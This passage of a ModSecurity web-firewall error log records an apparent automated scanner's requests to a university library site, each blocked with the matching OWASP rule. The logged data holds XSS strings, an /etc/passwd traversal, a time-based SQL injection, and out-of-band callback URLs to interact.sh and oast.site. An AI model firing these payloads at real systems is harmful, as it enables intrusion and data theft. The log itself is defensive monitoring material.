"/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAnn1@gAAAAe"]
[Tue Aug 29 11:51:55.715648 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAnIllkAAAAV"]
[Tue Aug 29 11:51:55.921113 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnkwc0AAAAY"]
[Tue Aug 29 11:51:56.592638 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnepQoAAAAK"]
[Tue Aug 29 11:51:57.607671 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAfWOJsAAAAL"]
[Tue Aug 29 11:51:58.571383 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnepQ0AAAAK"]
[Tue Aug 29 11:51:59.570817 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAn958sAAAAD"]
[Tue Aug 29 11:51:59.572872 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAlUln8AAAA0"]
[Tue Aug 29 11:52:01.577244 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAnkwdoAAAAY"]
[Tue Aug 29 11:52:02.633652 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAjdQZQAAAAZ"]
[Tue Aug 29 11:52:02.781610 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAhoHTQAAAAl"]
[Tue Aug 29 11:52:02.799012 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAnkwd8AAAAY"]
[Tue Aug 29 11:52:02.800586 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAn959MAAAAD"]
[Tue Aug 29 11:52:04.903919 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAlIBjQAAAAn"]
[Tue Aug 29 11:52:05.100693 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0pq1msppufkf3r.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0pq1msppufkf3r.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dcCo-f0AAAoAkuEAAAAC"]
[Tue Aug 29 11:52:05.535756 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAm@52kAAAAH"]
[Tue Aug 29 11:52:06.571212 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAjdQZ8AAAAZ"]
[Tue Aug 29 11:52:06.573564 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAn40ywAAAAW"]
[Tue Aug 29 11:52:08.595364 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAnkwe0AAAAY"]
[Tue Aug 29 11:52:08.675480 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAnkwfAAAAAY"]
[Tue Aug 29 11:52:09.600454 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAhoHUMAAAAl"]
[Tue Aug 29 11:52:09.673473 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAhoHUQAAAAl"]
[Tue Aug 29 11:52:10.696518 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAoCWEwAAAAB"]
[Tue Aug 29 11:52:11.691298 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15e8Co-f0AAAnkwfcAAAAY"]
[Tue Aug 29 11:52:11.715235 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAnTlMgAAAAA"]
[Tue Aug 29 11:52:12.623762 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAlIBkQAAAAn"]
[Tue Aug 29 11:52:13.711293 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnjjMgAAAAX"]
[Tue Aug 29 11:52:13.715265 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAn0GcQAAAAa"]
[Tue Aug 29 11:52:14.543561 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAni@-0AAAAU"]
[Tue Aug 29 11:52:14.683746 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAnIlpMAAAAV"]
[Tue Aug 29 11:52:14.739476 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAjdQbUAAAAZ"]
